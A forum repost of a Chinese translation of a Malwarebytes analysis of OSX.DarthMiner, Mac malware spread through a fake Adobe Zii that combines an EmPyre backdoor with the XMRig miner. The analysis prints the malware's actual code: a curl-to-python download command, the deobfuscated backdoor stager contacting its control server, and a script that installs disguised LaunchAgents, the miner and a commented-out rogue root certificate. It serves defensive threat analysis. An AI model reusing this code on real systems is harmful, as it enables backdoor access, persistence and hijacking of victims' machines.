首页
论坛
课程
招聘
[翻译]结合Empyre后门和XMRig挖矿软件的Mac恶意软件
2019-3-18 19:19 4503

[翻译]结合Empyre后门和XMRig挖矿软件的Mac恶意软件

2019-3-18 19:19
4503

本周早些时候(2018.12.7),我们发现了一种新的Mac恶意软件,这种软件出于恶意目的,结合了两种不同的开源工具――EmPyre后门和XMRig加密挖矿软件。

 

该恶意软件通过Adobe zii这一应用软件进行传播。Adobe zii是对Adobe软件进行盗版的软件。但在这种情况下,这个名为Adobe Zii的软件并不是真实的。

 

image

 

从以上截图中可以发现,实际的Adobe Zii软件(左侧),使用了Adobe Creative Cloud徽标(毕竟,如果要编写软件来帮助人们窃取Adobe软件,为什么不同时偷取徽标?)。然而,恶意软件安装程序使用通用的Automator applet图标。

行为表现

使用Automator打开假的Adobe Zii 软件,可以看到它仅仅运行了一个shell脚本。

 

image

curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app

这个脚本下载并运行了一个python脚本,然后下载并运行一个名为sample.app的应用。

 

simple.app 很简单,它只是某个版本的Adobe Zii,可能只是为了让这个恶意软件看起来更像是“合法的”。(这并不是指软件盗版是合法的,当然,这只是让这个恶意软件看起来正在做用户想让他做的事情)

 

这个python脚本是什么呢?它被混淆过,但是可以很容易就被解混淆,脚本如下:

import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
   sys.exit()
import urllib2;
UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://46.226.108.171:4444';t='/news.php';req=urllib2.Request(server+t);
req.add_header('User-Agent',UA);
req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=");
proxy = urllib2.ProxyHandler();
o = urllib2.build_opener(proxy);
urllib2.install_opener(o);
a=urllib2.urlopen(req).read();
IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[]
for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
exec(''.join(out))

这个脚本首先做的是寻找常用的外出防火墙Little Snitch是否存在,这种防火墙会将后门的网络连接报告给用户。如果Little Snitch存在,则恶意软件会失败。(当然,如果安装了像Little Snitch这样的防火墙,它就会阻止尝试下载此脚本的连接,因此在这一点上进行检查毫无价值。)

 

这个脚本打开EmPyre后门的连接,该后门能够将任意命令发送到受感染的Mac。后门打开后,它会收到一个命令,将以下脚本下载到/private/tmp/uploadminer.sh并执行:

# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges"
cd ~/Library/LaunchAgents
curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
launchctl load -w com.apple.rig.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl -o config.json http://46.226.108.171/config.json
curl -o xmrig http://46.226.108.171/xmrig
chmod +x ./xmrig
rm -rf ./xmrig2
rm -rf ./config2.json
./xmrig -c config.json &

这种脚本下载并安装恶意软件的另一个组件。创建了一个名为com.proxy.initialize.plist的启动代理,通过运行前面提到的混淆Python脚本来持久地打开后门。

 

该脚本还将XMRig cryptominer和配置文件下载到/Users/Shared/文件夹中,并设置名为com.apple.rig.plist的启动代理,以使XMRig进程在该配置处于活动状态时运行。(“com.apple”名称直接就是一个红色标志,是发现此恶意软件的根本原因。)

 

有趣的是,该脚本中有代码用于下载和安装与mitmproxy软件相关的根证书,该软件能够拦截所有网络流量,包括(借助证书)加密的“https”流量。但是,该代码已被注释掉,表明它没有激活。

 

从表面上看,这种恶意软件似乎是相当无攻击性的。由于占用了所有CPU/GPU,Cryptominers通常只会导致计算机速度变慢。

 

但是,这不仅仅是一个挖矿软件。该挖矿软件是通过后门发出的命令安装的,并且过去很可能已经发送给受感染的Mac其他命令。所以无法确切知道此恶意软件可能对受感染系统造成的损害。我们目前只观察到采矿行为并不意味着它从未做过其他事情。

启示

Malwarebytes for Mac将此恶意软件检测为OSX.DarthMiner。如果你被感染了,除了加密挖矿之外,不可能知道恶意软件还可能做了什么,完全有可能你的文件或者密码已经遭到泄露。

 

从中可以学到一个重要的教训:众所周知,软件盗版是在Mac上进行的最危险的活动之一。被感染的危险很高,但人们仍然会这样做。请在将来不要使用盗版软件,因为代价可能远高于正版软件的价格。

IOCs

Adobe Zii.app.zip SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

文章链接:https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/

 

翻译:看雪翻译小组 欢歌笑语
校对:看雪翻译小组 fyb波


2022 KCTF春季赛【最佳人气奖】火热评选中!快来投票吧~

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回